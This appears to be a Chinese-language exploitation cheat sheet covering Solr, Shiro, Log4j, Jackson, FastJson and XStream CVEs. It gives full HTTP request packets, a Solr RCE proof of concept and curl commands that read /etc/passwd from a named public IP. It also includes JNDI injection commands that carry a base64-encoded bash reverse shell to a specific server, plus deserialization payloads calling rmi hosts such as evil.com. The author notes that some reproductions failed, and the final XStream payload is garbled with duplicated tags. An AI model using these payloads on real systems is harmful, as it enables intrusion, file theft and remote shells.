Solr
默认端口:8983
命令执行(cve-2019-17558)
影响版本:5.0.0-8.3.1
https://github.com/jas502n/solr_rce
远程命令执行(cve-2019-0193)
影响版本:<8.2.0
条件:DataImportHandler模块和Admin UI未开启鉴权
选择Dataimport功能并选择debug模式,填入以下POC:
<dataConfig><dataSource type="URLDataSource"/><script><![CDATA[function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success"); } ]]></script><document> <entity name="stackoverflow" url="https://stackoverflow.com/feeds/tag/solr" processor="XPathEntityProcessor" forEach="/feed" transformer="script:poc" /></document>
</dataConfig>
点击Execute with this Confuguration会发送以下请求包:
POST /solr/test/dataimport?_=1565835261600&indent=on&wt=json HTTP/1.1
Host: localhost:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest
Content-Length: 679
Connection: close
Referer: http://localhost:8983/solr/
Cookie: csrftoken=gzcSR6Sj3SWd3v4ZxmV5OcZuPKbOhI6CMpgp5vIMvr5wQAL4stMtxJqL2sUE8INi; sessionid=snzojzqa5zn187oghf06z6xodulpohpr command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22touch+%2Ftmp%2Fsuccess%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
执行docker compose exec solr ls /tmp,可见/tmp/success已成功创建:
文件读取&SSRF (CVE-2021-27905)
全版本官方拒绝修复漏洞
获取数据库名
http://47.94.236.117:8983/solr/admin/cores?indexInfo=false&wt=json
触发漏洞
curl -i -s -k -X $‘POST’
-H $‘Content-Type: application/json’ --data-binary $‘{“set-property”:{“requestDispatcher.requestParsers.enableRemoteStreaming”:true}}’
$‘http://47.94.236.117:8983/solr/demo/config’
任意文件读取
curl -i -s -k ‘http://47.94.236.117:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd’
Shiro
CVE_2016_4437 Shiro-550+Shiro-721(RCE)
影响版本:<=1.2.4
CVE-2020-11989(身份认证绕过)
影响版本:<1.7.1
POC:/admin/%20
这里admin指的是需要鉴权的目录
CVE-2020-1957(身份认证绕过)
影响版本:<1.5.3
Poc:/xxx/…;/admin/
CVE-2022-32532(身份验证绕过)
影响版本:<1.9.1
Poc: /permit/any
Log4j
是一个基于Java的日志记录框架。
l流量特征:${jndi:rmi:///}
Log4j2远程命令执行(CVE-2021-44228)
影响版本:Apache Log4j2 2.0 - 2.15.0-rc1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTcuNzIuMTIwLjIyLzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}” -A 117.72.120.22
中间的是base64编码的命令
将粉色字体payload替换进payload
Payload:${jndi:rmi://117.72.120.22:1099/x83lta}
url编码后,填在参数值
执行后发现有请求变化
成功反弹shell
Jackson
当下流行的json解释器,主要负责处理Json的序列化和反序列化
代码执行(cve-2020-8840)
条件:
开启enableDefaultTyping()
使用了org.apache.xbean.propertyeditor.JndiConverter第三方依赖
payload:String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://117.72.120.22:1389/r8f7d5\"}]";
使用jndi注入工具生成ldap
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTcuNzIuMTIwLjIyLzg4ODggMD4mMQ==}|e64,-d}|{bash,-i}” -A 117.72.120.22
POC数据包:
POST /Jacksondatabind/attack HTTP/1.1
Host: 123.58.224.8:30331
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1731237435
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/json
Content-Length: 102
content=[“org.apache.xbean.propertyeditor.JndiConverter”,{“asText”:“rmi://117.72.120.22:1099/mqqwtd”}]
这里我复现失败了
代码执行 (cve-2020-35728)
影响版本:FasterXML jackson-databind 2.x < 2.9.10.8
payload:
String payload = "[\"com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"rmi://47.94.236.117:1099/gtaafz\"}]";
访问路径/Jacksondatabind/attack会出现报错
复现数据包和cve-2020-35728一模一样
FastJson
阿里巴巴公司开源的json解析器,它可以解析JSON格式的字符串,支持将JavaBean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。
重点就是:不同版本的fastjson,不同的poc
<=1.2.14
poc:
{
“b”:{
“@type”:“com.sun.rowset.JdbcRowSetImpl”,
“dataSourceName”:“rmi://evil.com:9999/TouchFile”,
“autoCommit”:true
}
}
<=1.2.47
{
“a”:{
“@type”:“java.lang.Class”,
“val”:“com.sun.rowset.JdbcRowSetImpl”
},
“b”:{
“@type”:“com.sun.rowset.JdbcRowSetImpl”,
“dataSourceName”:“rmi://evil.com:9999/Exploit”,
“autoCommit”:true
}
}
XStream
代码执行 (CVE-2021-21351)
影响版本:<=1.4.15
使用JNDI注入
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTcuNzIuMTIwLjIyLzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}” -A 117.72.120.22
数据包:
POST / HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/xml
Content-Length: 3184<sorted-set><javax.naming.ldap.Rdn_-RdnEntry><type>ysomap</type><value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'><m__DTMXRTreeFrag><m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'><m__size>-10086</m__size><m__mgrDefault><__overrideDefaultParser>false</__overrideDefaultParser><m__incremental>false</m__incremental><m__source__location>false</m__source__location><m__dtms><null/></m__dtms><m__defaultHandler/></m__mgrDefault><m__shouldStripWS>false</m__shouldStripWS><m__indexing>false</m__indexing><m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'><fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'><javax.sql.rowset.BaseRowSet><default><concurrency>1008</concurrency><escapeProcessing>true</escapeProcessing><fetchDir>1000</fetchDir><fetchSize>0</fetchSize><isolation>2</isolation><maxFieldSize>0</maxFieldSize><maxRows>0</maxRows><queryTimeout>0</queryTimeout><readOnly>true</readOnly><rowSetType>1004</rowSetType><showDeleted>false</showDeleted><dataSource>rmi://evil-ip:1099/example</dataSource><listeners/><params/></default></javax.sql.rowset.BaseRowSet><com.sun.rowset.JdbcRowSetImpl><default/></com.sun.rowset.JdbcRowSetImpl></fPullParserConfig><fConfigSetInput><class>com.sun.rowset.JdbcRowSetImpl</class><name>setAutoCommit</name><parameter-types><class>boolean</class></parameter-types></fConfigSetInput><fConfigParse reference='../fConfigSetInput'/><fParseInProgress>false</fParseInProgress></m__incrementalSAXSource><m__walker><nextIsRaw>false</nextIsRaw></m__walker><m__endDocumentOccured>false</m__endDocumentOccured><m__idAttributes/><m__textPendingStart>-1</m__textPendingStart><m__useSourceLocationProperty>false</m__useSourceLocationProperty><m__pastFirstElement>false</m__pastFirstElement></m__dtm><m__dtmIdentity>1</m__dtmIdentity></m__DTMXRTreeFrag><m__dtmRoot>1</m__dtmRoot><m__allowRelease>false</m__allowRelease></value></javax.naming.ldap.Rdn_-RdnEntry><javax.naming.ldap.Rdn_-RdnEntry><type>ysomap</type><value class='com.sun.org.apache.xpath.internal.objects.XString'><m__obj class='string'>test</m__obj></value></javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>
我复现失败
代码执行 (CVE-2021-29505)
影响版本:<=1.4.16
POST / HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/xml
Content-Length: 3169<java.util.PriorityQueue serialization='custom'><unserializable-parents/><java.util.PriorityQueue><default><size>2</size></default><int>3</int><javax.naming.ldap.Rdn_-RdnEntry><type>12345</type><value class='com.sun.org.apache.xpath.internal.objects.XString'><m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj></value></javax.naming.ldap.Rdn_-RdnEntry><javax.naming.ldap.Rdn_-RdnEntry><type>12345</type><value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'><message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'><parsedMessage>true</parsedMessage><soapVersion>SOAP_11</soapVersion><bodyParts/><sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'><attachmentsInitialized>false</attachmentsInitialized><nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'><aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'><candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'><names><string>aa</string><string>aa</string></names><ctx><environment/><registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'><java.rmi.server.RemoteObject><string>UnicastRef</string><string>evil-ip</string><int>1099</int><long>0</long><int>0</int><long>0</long><short>0</short><boolean>false</boolean></java.rmi.server.RemoteObject></registry><host>evil-ip</host><port>1099</port></ctx></candidates></aliases></nullIter></sm></message></value></javax.naming.ldap.Rdn_-RdnEntry></java.util.PriorityQueue>
</java.util.PriorityQueue>
<host>evil-ip</host><port>1099</port></ctx></candidates></aliases></nullIter></sm></message></value></javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
[Vulhub - Docker-Compose file for vulnerability environment](https://vulhub.org/#/environments/xstream/CVE-2021-29505/)
![边缘提取函数 [OPENCV--2]](https://i-blog.csdnimg.cn/direct/0d172bb166794fb28761b733653e29a8.png)
